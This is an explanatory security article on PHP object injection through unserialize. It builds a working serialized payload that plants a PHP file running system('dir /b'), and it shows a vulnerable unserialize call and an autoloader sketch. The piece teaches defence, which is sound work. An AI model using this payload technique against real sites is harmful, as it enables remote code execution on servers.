Why You Should Never Pass Untrusted Data to Unserialize When Writing PHP Code
Unserialize is a PHP function that, while often classified as a security risk, is seldom defined. This article explains the vulnerability and contains a PHP Classes Crash Course that includes properties and ‘magic methods’. It uses examples to illustrate the basic concepts of Deserialization, PHP Object Injection and Class Autoloading in PHP.
In PHP, as in every other programming language you use for web development, developers should avoid writing code that passes user-controlled input to dangerous functions. This is one of the basics of secure programming. Whenever a function has the capability to execute a dangerous action, it should either not receive user input, or the user-controlled data should be sanitized in order to prevent a malicious user from breaking the intended functionality.
In most scenarios, it’s obvious why a given function argument should not be user-controllable. Many programming guides supply a list of the relevant functions. The following (incomplete) table lists a few examples for PHP.
Function | Reasons to be Careful |
system | These functions allow you to execute system commands. They, therefore, should not accept user-controlled input in arguments. |
include | Using one of these functions on user-controlled input can lead to local or remote file inclusions. |
unserialize | This function is very often left unexplained! |
Unserialize is the counterpart of serialize. Serialize converts an object into a string that can be stored and used later, so that it can be passed to other functions, or cached in case it’s going to be needed often. Unserialize turns such a string back into an object. Almost every guide on developing secure PHP applications mentions the unserialize function, but few explain why you should never use it on user-supplied input.
The reality is that exposing this function can have serious consequences. In fact, using user-controlled input in unserialize is so dangerous that even the developers of PHP stopped treating exploitable bugs in the C code that powers unserialize as security vulnerabilities (see Unserialize security policy).
This sounds a little confusing at first, but if you examine the PHP documentation, you will see that it suggests that you never use unserialize on user-supplied input. This is a very clear warning. The PHP language developers assume that you would never expose this function to an attacker. This means that even if someone discovers an exploitable buffer overflow in PHP (that’s caused by unserialize), it will not be considered a security vulnerability by the PHP developers – because unserialize was never designed to be used in this way in the first place!
💡 It’s worth pointing out that popular PHP web applications, including Joomla, WordPress and Piwik, have suffered from PHP object injection vulnerabilities.
PHP Classes Crash Course
To understand the problem with unserialize, you first have to have a basic understanding of PHP classes. I created the class below and will explain to you how it works.
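A minimal sketch of such a class, reconstructed from the description and the serialized output in this article. The method bodies, the date format and the creation of the logs directory are assumptions, not the original listing:

```php
<?php

class Logging
{
    public $last_log, $last_time;
    protected $log_date, $username;
    private $log_file;

    public function __construct($username)
    {
        $this->username = $username;
        $this->log_date = date('d-m-y');
        $this->log_file = 'logs/' . $username . '_' . $this->log_date . '.log';
        $this->createLog();
    }

    // Creates the log file (and, as an assumption, its directory) if missing.
    public function createLog()
    {
        $dir = dirname($this->log_file);
        if (!is_dir($dir)) {
            mkdir($dir, 0755, true);
        }
        if (!file_exists($this->log_file)) {
            touch($this->log_file);
        }
    }

    // Appends an entry to the log file and remembers it in the object.
    public function logAction($action)
    {
        $this->last_log = $action;
        $this->last_time = time();
        file_put_contents($this->log_file, $action . PHP_EOL, FILE_APPEND);
    }

    // Runs automatically when a serialized Logging object is deserialized.
    public function __wakeup()
    {
        $this->createLog();
        $this->logAction($this->last_log);
    }
}
```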
- In line 3, I created a name for the class, Logging.
- In lines 5-7 I defined different properties (or variables) for the class. As you can see, I used the public, protected and private keywords. Their purpose is easily explained.
Properties
If I created a subclass from my Logging class, it would inherit all the public and protected properties. This means if I created a subclass named LoggingSubclass, I could access all the protected and public properties, while the private ones would be accessible only by the class that created them.
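The inheritance rule can be checked with a short sketch. The Logging class here is a trimmed stand-in with one property per visibility level, and the two helper methods are hypothetical names added only for the demonstration:

```php
<?php

// Trimmed stand-in for the Logging class: one property per visibility level.
class Logging
{
    public $last_log = 'public value';
    protected $username = 'protected value';
    private $log_file = 'private value';
}

class LoggingSubclass extends Logging
{
    // Public and protected properties are inherited and readable here.
    public function readInherited()
    {
        return [$this->last_log, $this->username];
    }

    // get_object_vars() only returns properties accessible from the calling
    // scope, so the parent's private property does not show up here.
    public function canSeePrivate()
    {
        return array_key_exists('log_file', get_object_vars($this));
    }
}

$sub = new LoggingSubclass();
print_r($sub->readInherited());
var_dump($sub->canSeePrivate()); // bool(false)
```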
Even though both the public and protected properties can be inherited, there is a small difference between the two. You can get, and set, a public property as illustrated.
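A minimal sketch of getting and setting a public property from outside the class. The Account class and its name property are hypothetical:

```php
<?php

class Account // hypothetical example class
{
    public $name = 'Alice';
}

$account = new Account();
echo $account->name, PHP_EOL; // get: prints "Alice"

$account->name = 'Bob';       // set
echo $account->name, PHP_EOL; // prints "Bob"
```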
However, a protected property is only meant for internal use within the class and can’t be accessed directly. From my description, you have probably noticed that I didn’t use the keywords correctly in the example above. It would be enough to set them all to protected, as we don’t need to access them. The reason I wanted to include all the keywords will become obvious later when we examine the serialize function.
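By contrast, reading a protected property from outside the class fails. The sketch below assumes PHP 7 or later, where this raises an Error that can be caught. The Vault class and its members are hypothetical:

```php
<?php

class Vault // hypothetical example class
{
    protected $secret = 'internal';

    // Code inside the class may use the protected property freely.
    public function reveal()
    {
        return $this->secret;
    }
}

$vault = new Vault();
$message = null;

try {
    echo $vault->secret; // not allowed from outside the class
} catch (Error $e) {
    $message = $e->getMessage();
}

echo $message, PHP_EOL;
echo $vault->reveal(), PHP_EOL; // prints "internal"
```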
Magic Methods
You can see that I have defined the __construct method (or function). This is sometimes referred to as a ‘magic method’. Magic methods are named after the specific action that leads to their execution. They’re easily recognized by their two leading underscores.
For example, __construct will be called as soon as we create a new instance of the class. This is done using the ‘new’ keyword displayed in the code above. We can pass arguments to the __construct method by writing them in parentheses after the class name: new Test('value'). If we create a new instance of a class, all its methods and properties are returned in an object we can easily access.
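A minimal sketch of a constructor receiving its argument. The Test class name comes from the sentence above, while its value property is an assumption:

```php
<?php

class Test
{
    public $value;

    // Called automatically by "new Test(...)".
    public function __construct($value)
    {
        $this->value = $value;
    }
}

$test = new Test('value');
echo $test->value, PHP_EOL; // prints "value"
```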
Later in the code, there is the createLog method, which creates a new log file if it doesn’t yet exist, and the logAction method, which writes a new log entry into the file. However, there is one method in the Logging class that we’ve not yet mentioned: __wakeup. You can tell that it’s a magic method like __construct from its initial two underscore characters. However, instead of being called after a new instance of a class is created, __wakeup will be called as soon as a serialized object of the class is deserialized.
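The difference between the two magic methods can be observed with a small sketch. The Session class and its events property are hypothetical, and the serialize and unserialize calls it uses are explained in the next section:

```php
<?php

class Session // hypothetical example class
{
    public $events = [];

    public function __construct()
    {
        $this->events[] = 'constructed';
    }

    public function __wakeup()
    {
        $this->events[] = 'woken up';
    }
}

$original = new Session();                 // runs __construct
$copy = unserialize(serialize($original)); // runs __wakeup, not __construct

print_r($original->events); // only "constructed"
print_r($copy->events);     // "constructed" (restored), then "woken up"
```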
What is (De)serialization?
serialize()
Simply put, when you serialize an object, you create a string representation of it. To do this, you use the serialize function as illustrated. Since the output may contain null-bytes that are not visible, I used the str_replace function to make them visible.
As you see, we have created a new instance of the Logging class and chosen ‘Alice’ as the username. We also made a test entry that should already be logged. According to the code, this should set the log_file property to something like ‘logs/Alice_07-09-17.log’ and the last_log property to ‘making a test entry’.
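A sketch of that call, using a trimmed stand-in for the Logging class (same properties, file handling left out as an assumption so the example runs anywhere):

```php
<?php

// Trimmed stand-in for the Logging class: same properties, no file handling.
class Logging
{
    public $last_log, $last_time;
    protected $log_date, $username;
    private $log_file;

    public function __construct($username)
    {
        $this->username = $username;
        $this->log_date = date('d-m-y');
        $this->log_file = 'logs/' . $username . '_' . $this->log_date . '.log';
    }

    public function logAction($action)
    {
        $this->last_log = $action;
        $this->last_time = time();
    }
}

$log = new Logging('Alice');
$log->logAction('making a test entry');

// Replace each real null byte with the four visible characters \x00.
$visible = str_replace("\0", '\x00', serialize($log));
echo $visible, PHP_EOL;
```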
Let’s take a look at the serialized output:
O:7:"Logging":5:{s:8:"last_log";s:19:"making a test entry";s:9:"last_time";i:1504796057;s:11:"\x00*\x00log_date";s:8:"07-09-17";s:11:"\x00*\x00username";s:5:"Alice";s:17:"\x00Logging\x00log_file";s:23:"logs/Alice_07-09-17.log";}
This table explains what’s going on in the code.
Code | Action |
O:7:"Logging":5:{ … } | This is an object of our Logging class. Objects always begin with an uppercase ‘O’ in serialized strings. After a colon there is the number of characters in the class name, in this case ‘7’. After another colon, there is the actual class name in double quotes, followed by the number of properties (‘5’). The properties are then listed within the curly brackets. |
s:8:"last_log";s:19:"making a test entry"; | This is a public property. The property name is a string, indicated by a lowercase ‘s’, followed by the number of characters. In this case it’s ‘8’, because last_log has eight characters. After the semicolon there is the property value with the same syntax. |
s:11:"\x00*\x00log_date";s:8:"07-09-17"; | This follows the same logic as above, but this time we have a protected property. Serialize indicates that the property is protected by putting ‘\x00*\x00’ in front of the property name. |
s:17:"\x00Logging\x00log_file";s:23:"logs/Alice_07-09-17.log"; | This is what a private property looks like. Instead of the asterisk character, serialize puts the class name between the two null-bytes. Keep in mind that instead of ‘\x00’, serialize uses an actual null-byte. You should remember this when you read the output of serialize, as null-bytes are non-printable characters. |
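The length prefixes in the table count the null-bytes as one character each. A quick check of the two prefixed property names:

```php
<?php

// "\0" inside double quotes is a single real null byte.
$protectedName = "\0*\0log_date";
$privateName = "\0Logging\0log_file";

echo strlen($protectedName), PHP_EOL; // 11
echo strlen($privateName), PHP_EOL;   // 17
```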
unserialize()
By using unserialize, we achieve exactly the opposite. Instead of turning an object into a string, we turn a string produced by serialize back into an object. To do this, unserialize reads the class name from the string and searches for a class with that name. In our case, O:7:"Logging":[…] would result in PHP searching for a class with the name ‘Logging’. If it found one, it would create an object of that class and fill it with all the properties from the serialized string.
Once this is done, the object is in the same state as it was before it was serialized. Therefore you can, for example, take an instance of the Logging class, serialize it, put the resulting string into a database and then deserialize it again when it’s needed.
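A minimal round trip on trusted data, as a sketch. The Preferences class is hypothetical and the $stored variable stands in for a database column or cache entry:

```php
<?php

class Preferences // hypothetical example class
{
    public $theme = 'light';
    protected $language = 'en';
}

$prefs = new Preferences();
$prefs->theme = 'dark';

$stored = serialize($prefs);      // string that could be written to storage
$restored = unserialize($stored); // trusted data that we produced ourselves

var_dump($restored == $prefs);  // bool(true): same class, same property values
var_dump($restored === $prefs); // bool(false): a new, separate instance
```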
Introducing PHP Object Injection
Let’s summarize what we’ve discussed so far:
- When we deserialize a serialized object the __wakeup method is called automatically
- We can control any of the property values
- We can control what class we want to create an object for
- All we need in order to achieve what we want is user-controllable input in unserialize
Now let’s imagine we have the following code:
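A sketch of the vulnerable pattern, wrapped in a function so that it can be run outside a web server. The function name handle_request is hypothetical, and the parameter name data is taken from the exploit string later in this article:

```php
<?php

// Vulnerable pattern: attacker-controlled input reaches unserialize() unchanged.
function handle_request(array $query)
{
    return unserialize($query['data']);
}

// In a web context this would be called as handle_request($_GET).
var_dump(handle_request(['data' => 'a:1:{i:0;s:2:"ok";}']));
```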
As you can clearly see, there is an unserialize call that takes user input as its parameter. Let’s assume the file with our Logging class from above is already included. Is there a way we can gain code execution?
First let’s take a look at the magic method again.
There are two properties in there: log_file and last_log. With createLog we can create a file with the path in the log_file property, and with logAction we can write arbitrary data into it. To gain code execution, an attacker’s goal would be to create a file with a .php extension and then write some PHP code into it. That means we need to pass a string to unserialize that contains a path to a file in the web root. From the code, we know that the logs directory should be writeable. So, we need to add malicious PHP code. For a proof of concept we can execute a system command, for example system('dir /b'), on a Windows host. This would reveal all the files in the current directory.
Building an Exploit
Let’s start with O:7:"Logging":2:{}, since we want the Logging class.
Then we need to specify a file path. Let’s choose s:17:"\x00Logging\x00log_file";s:12:"logs/poc.php";. As you can see, log_file is a private property, which is why we need to add \x00Logging\x00 in front of it.
Now we also need to add the PHP code that we want to execute. This code must be inside the last_log property. So we need to add s:8:"last_log";s:26:"<?php system('dir /b'); ?>";.
The finished string we have to pass in the GET variable data is this:
O:7:"Logging":2:{s:17:"%00Logging%00log_file";s:12:"logs/poc.php";s:8:"last_log";s:26:"<?php system('dir /b'); ?>";}
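The length prefixes are easy to get wrong by hand, so it can help to let PHP compute them. The sketch below only assembles and prints the string; the variable names are hypothetical, and only the null-bytes are percent-encoded to mirror the string above:

```php
<?php

$path = 'logs/poc.php';
$code = "<?php system('dir /b'); ?>";
$privateName = "\0Logging\0log_file"; // private property: \0ClassName\0property

$payload = 'O:7:"Logging":2:{'
    . 's:' . strlen($privateName) . ':"' . $privateName . '";'
    . 's:' . strlen($path) . ':"' . $path . '";'
    . 's:8:"last_log";'
    . 's:' . strlen($code) . ':"' . $code . '";'
    . '}';

// Make the null bytes URL-safe; the rest is left as-is for readability.
$forUrl = str_replace("\0", '%00', $payload);
echo $forUrl, PHP_EOL;
```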
After this, we can look at logs/poc.php to see if our exploit attempt was successful.
As you can see, the poc.php file was created and the PHP code was parsed. The dir /b command executed successfully, and you can see that within the logs directory there are entries from ‘Alice’ and ‘user’. Instead of this relatively harmless payload, an attacker could choose one that opens a reverse shell, which would help them to completely take over the server.
💡 Did you know? PHP Object Injection was thought to be harmless due to a lack of useful __wakeup magic methods. However, in 2009, Stefan Esser explained in his talk Shocking News in PHP Exploitation that with PHP 5’s __destruct method and __autoload function, Object Injection had become a dangerous possibility in mainstream applications and frameworks.
Class Autoloading in PHP
We were lucky that the ‘Logging’ class was included in the page. But what happens when the class is in another file that we don’t have access to? If we are lucky, there is an autoloading feature on the page. Whenever a class is called – or an object is deserialized – PHP searches for the class. If it is not found, it will simply throw an error. However, when a function like the following is defined somewhere, PHP will pass the class name to it and then attempt to load the class again. It is only if that attempt also fails that it throws an error.
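A sketch of such an autoloader. Older PHP versions used a global __autoload function for this; because that function was removed in PHP 8.0, the sketch uses spl_autoload_register instead. The $requested array, the is_file check and the SomeClass name are assumptions added so that the example runs cleanly and shows what the autoloader receives:

```php
<?php

$requested = [];

// Hypothetical autoloader: turns any requested class name into a file name.
spl_autoload_register(function ($class_name) use (&$requested) {
    $requested[] = $class_name; // recorded only for this demonstration
    $file = $class_name . '.php';
    if (is_file($file)) {
        include $file; // the class name, and so the file name, comes from the input
    }
});

// The class name inside the serialized string is passed to the autoloader.
$object = unserialize('O:9:"SomeClass":0:{}');

print_r($requested);
// No SomeClass.php exists here, so unserialize() falls back to a placeholder.
echo get_class($object), PHP_EOL;
```

When the class name comes from a `new` expression instead of unserialize, a class that is still missing after autoloading results in an Error.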
As you see, this can also lead to an LFI, by deserializing an object whose class name matches the name of a PHP file on the server. While this does not seem useful at first, due to the forced .php extension, it can give attackers access to functions that are otherwise inaccessible.
Defining Exactly Why the Unserialize Function is Dangerous
The impact of using user-controlled input, together with the unserialize function, strongly depends on the available magic methods and the code inside them. Aside from __wakeup, there are other magic methods that can be abused, for example, __toString. They don’t need to be easily accessible, but could be abused using the autoload functionality and external libraries in your project.
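A sketch of two other magic methods firing on a deserialized object. The Report class, its title property and the static $calls array are hypothetical and only record which methods ran:

```php
<?php

class Report // hypothetical example class
{
    public static $calls = []; // static properties are not part of serialized data
    public $title = 'untitled';

    public function __toString()
    {
        self::$calls[] = '__toString';
        return $this->title;
    }

    public function __destruct()
    {
        self::$calls[] = '__destruct';
    }
}

// The property value comes entirely from the serialized string.
$object = unserialize('O:6:"Report":1:{s:5:"title";s:8:"injected";}');

$text = 'Title: ' . $object; // string context triggers __toString
unset($object);              // last reference removed, __destruct runs

echo $text, PHP_EOL;
print_r(Report::$calls);
```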
Finally, even if you don’t have any exploitable methods, there can still be exploitable bugs in the underlying C code in PHP, which can be abused using unserialize. However, the PHP developers do not consider them to be security issues and therefore give them a lower priority.
It is at this point that we can populate our Functions table from above with the appropriate content.
Function | Reasons to be (Super) Careful |
unserialize | This function can be abused by attackers to gain remote code execution, local file inclusion and a wide range of other vulnerabilities, depending on the code within available magic methods. Attackers can abuse this by deserializing their own malicious PHP objects. |
Our conclusion and recommendation is that you should never use unserialize on user input.